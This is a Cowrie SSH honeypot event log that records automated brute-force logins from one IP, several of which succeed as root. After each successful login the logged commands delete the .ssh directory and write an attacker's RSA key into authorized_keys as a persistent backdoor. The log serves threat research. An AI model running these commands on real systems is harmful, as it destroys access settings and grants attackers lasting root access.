{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:21:35.874375Z","src_ip":"212.227.235.229","session":"bbb7e8295aa9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:21:35.875330Z","src_ip":"212.227.235.229","session":"bbb7e8295aa9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57178,"dst_ip":"1.2.3.4","dst_port":22,"session":"29b525929149","protocol":"ssh","message":"New connection: 212.227.235.229:57178 (1.2.3.4:22) [session: 29b525929149]","sensor":"my-vps","timestamp":"2025-09-08T23:21:35.967732Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:21:35.968745Z","src_ip":"212.227.235.229","session":"29b525929149"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:21:36.063453Z","src_ip":"212.227.235.229","session":"29b525929149"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:21:36.490728Z","src_ip":"212.227.235.229","session":"29b525929149"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:21:37.593487Z","src_ip":"212.227.235.229","session":"29b525929149"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57186,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce1c248a7336","protocol":"ssh","message":"New connection: 212.227.235.229:57186 (1.2.3.4:22) [session: ce1c248a7336]","sensor":"my-vps","timestamp":"2025-09-08T23:21:37.693920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:21:37.699538Z","src_ip":"212.227.235.229","session":"ce1c248a7336"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:21:37.799302Z","src_ip":"212.227.235.229","session":"ce1c248a7336"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:21:38.200563Z","src_ip":"212.227.235.229","session":"ce1c248a7336"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:21:38.302903Z","src_ip":"212.227.235.229","session":"bbb7e8295aa9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:21:38.303811Z","src_ip":"212.227.235.229","session":"ce1c248a7336"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52618,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfc93ade35e5","protocol":"ssh","message":"New connection: 212.227.235.229:52618 (1.2.3.4:22) [session: dfc93ade35e5]","sensor":"my-vps","timestamp":"2025-09-08T23:22:31.503581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:22:31.504575Z","src_ip":"212.227.235.229","session":"dfc93ade35e5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:22:31.640845Z","src_ip":"212.227.235.229","session":"dfc93ade35e5"}
{"eventid":"cowrie.login.failed","username":"muhammed","password":"muhammed1234","message":"login attempt [muhammed/muhammed1234] failed","sensor":"my-vps","timestamp":"2025-09-08T23:22:32.216713Z","src_ip":"212.227.235.229","session":"dfc93ade35e5"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:22:33.359139Z","src_ip":"212.227.235.229","session":"dfc93ade35e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55782,"dst_ip":"1.2.3.4","dst_port":22,"session":"edf564896d60","protocol":"ssh","message":"New connection: 212.227.235.229:55782 (1.2.3.4:22) [session: edf564896d60]","sensor":"my-vps","timestamp":"2025-09-08T23:22:41.812931Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:22:41.813814Z","src_ip":"212.227.235.229","session":"edf564896d60"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:22:41.910047Z","src_ip":"212.227.235.229","session":"edf564896d60"}
{"eventid":"cowrie.login.success","username":"root","password":"12345a","message":"login attempt [root/12345a] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:22:42.332768Z","src_ip":"212.227.235.229","session":"edf564896d60"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:22:42.546851Z","src_ip":"212.227.235.229","session":"edf564896d60"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:22:42.547584Z","src_ip":"212.227.235.229","session":"edf564896d60"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:22:42.549343Z","src_ip":"212.227.235.229","session":"edf564896d60"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:22:42.646272Z","src_ip":"212.227.235.229","session":"edf564896d60"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:22:42.943700Z","src_ip":"212.227.235.229","session":"edf564896d60"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:22:42.944389Z","src_ip":"212.227.235.229","session":"edf564896d60"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:22:43.043363Z","src_ip":"212.227.235.229","session":"edf564896d60"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:22:43.044366Z","src_ip":"212.227.235.229","session":"edf564896d60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55784,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e2345e3f667","protocol":"ssh","message":"New connection: 212.227.235.229:55784 (1.2.3.4:22) [session: 3e2345e3f667]","sensor":"my-vps","timestamp":"2025-09-08T23:22:43.142607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:22:43.158422Z","src_ip":"212.227.235.229","session":"3e2345e3f667"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:22:43.258265Z","src_ip":"212.227.235.229","session":"3e2345e3f667"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:22:43.660061Z","src_ip":"212.227.235.229","session":"3e2345e3f667"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33686,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0792fa05c45","protocol":"ssh","message":"New connection: 212.227.235.229:33686 (1.2.3.4:22) [session: a0792fa05c45]","sensor":"my-vps","timestamp":"2025-09-08T23:22:44.139688Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:22:44.140572Z","src_ip":"212.227.235.229","session":"a0792fa05c45"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:22:44.681261Z","src_ip":"212.227.235.229","session":"a0792fa05c45"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:22:44.761968Z","src_ip":"212.227.235.229","session":"3e2345e3f667"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55786,"dst_ip":"1.2.3.4","dst_port":22,"session":"d30a01c710d2","protocol":"ssh","message":"New connection: 212.227.235.229:55786 (1.2.3.4:22) [session: d30a01c710d2]","sensor":"my-vps","timestamp":"2025-09-08T23:22:44.856905Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:22:44.858199Z","src_ip":"212.227.235.229","session":"d30a01c710d2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:22:44.955443Z","src_ip":"212.227.235.229","session":"d30a01c710d2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:22:45.382457Z","src_ip":"212.227.235.229","session":"d30a01c710d2"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:22:45.479124Z","src_ip":"212.227.235.229","session":"edf564896d60"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:22:45.480247Z","src_ip":"212.227.235.229","session":"d30a01c710d2"}
{"eventid":"cowrie.login.success","username":"root","password":"P@Ssw0rd!@#123","message":"login attempt [root/P@Ssw0rd!@#123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:22:45.955274Z","src_ip":"212.227.235.229","session":"a0792fa05c45"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:22:46.631531Z","src_ip":"212.227.235.229","session":"a0792fa05c45"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:22:46.632318Z","src_ip":"212.227.235.229","session":"a0792fa05c45"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:22:46.633147Z","src_ip":"212.227.235.229","session":"a0792fa05c45"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:22:46.942333Z","src_ip":"212.227.235.229","session":"a0792fa05c45"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:22:47.582768Z","src_ip":"212.227.235.229","session":"a0792fa05c45"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:22:47.583469Z","src_ip":"212.227.235.229","session":"a0792fa05c45"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:22:47.892917Z","src_ip":"212.227.235.229","session":"a0792fa05c45"}
